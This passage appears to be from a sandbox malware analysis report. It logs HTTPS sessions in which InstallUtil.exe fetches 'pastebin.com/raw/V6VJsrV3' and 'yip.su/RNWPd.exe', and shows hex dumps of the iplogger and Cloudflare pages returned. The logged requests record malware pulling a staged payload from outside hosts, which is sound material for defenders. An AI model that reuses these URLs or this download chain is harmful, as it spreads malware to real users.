                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3eHo8NLHXaKAt8Lw3YhNJ%2FzHzMR8Xsmy%2FCi4mCUzOlJyskmi8nRz7tcP0CFPhVQz2Hpd4PexMYHZnr54zoSR7MRlApG65pY7LZL1ZoSwt0mOBxTpjJUxvu4%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227e234a557cab-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:02:00 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:02:00 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                          Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                          2024-09-12 20:02:00 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                          Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                          2024-09-12 20:02:00 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                          Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                          2024-09-12 20:02:00 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                          Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                          2024-09-12 20:02:00 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                          Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                          2024-09-12 20:02:00 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          17192.168.2.849732172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:06 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:02:06 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227e447ac04387-EWR
                          2024-09-12 20:02:06 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                          Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                          2024-09-12 20:02:06 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                          Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                          2024-09-12 20:02:06 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                          Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                          2024-09-12 20:02:06 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                          Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                          2024-09-12 20:02:06 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          18192.168.2.849733188.114.96.34436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:07 UTC65OUTGET /RNWPd.exe HTTP/1.1
                          Host: yip.su
                          Connection: Keep-Alive
                          2024-09-12 20:02:07 UTC900INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          memory: 0.36197662353515625
                          expires: Thu, 12 Sep 2024 20:02:07 +0000
                          strict-transport-security: max-age=604800
                          strict-transport-security: max-age=31536000
                          content-security-policy: img-src https: data:; upgrade-insecure-requests
                          x-frame-options: SAMEORIGIN
                          Cache-Control: max-age=14400
                          CF-Cache-Status: EXPIRED
                          Last-Modified: Thu, 12 Sep 2024 20:02:07 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0hClqQ5V5Gs5%2BMupUVyJACVFjhcl04ys0fB50lG958VYcQbzpsMTaTNuWdKe2rXR4PpvjvcXALpLdsobwK%2Fo52XGbgMeN5WsVPRsOk3vF5gUPsXjyd%2FuBQ%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8c227e4a7ac4728a-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-09-12 20:02:07 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                          Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                          2024-09-12 20:02:07 UTC1369INData Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74
                          Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
                          2024-09-12 20:02:07 UTC1369INData Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a
                          Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                          2024-09-12 20:02:07 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                          Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                          2024-09-12 20:02:07 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                          Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                          2024-09-12 20:02:07 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                          Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                          2024-09-12 20:02:07 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                          2024-09-12 20:02:07 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.849734172.67.19.244436060C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          TimestampBytes transferredDirectionData
                          2024-09-12 20:02:12 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                          Host: pastebin.com
                          Connection: Keep-Alive
                          2024-09-12 20:02:12 UTC222INHTTP/1.1 200 OK
                          Date: Thu, 12 Sep 2024 20:02:12 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          X-Frame-Options: SAMEORIGIN
                          Server: cloudflare
                          CF-RAY: 8c227e6d49120c74-EWR
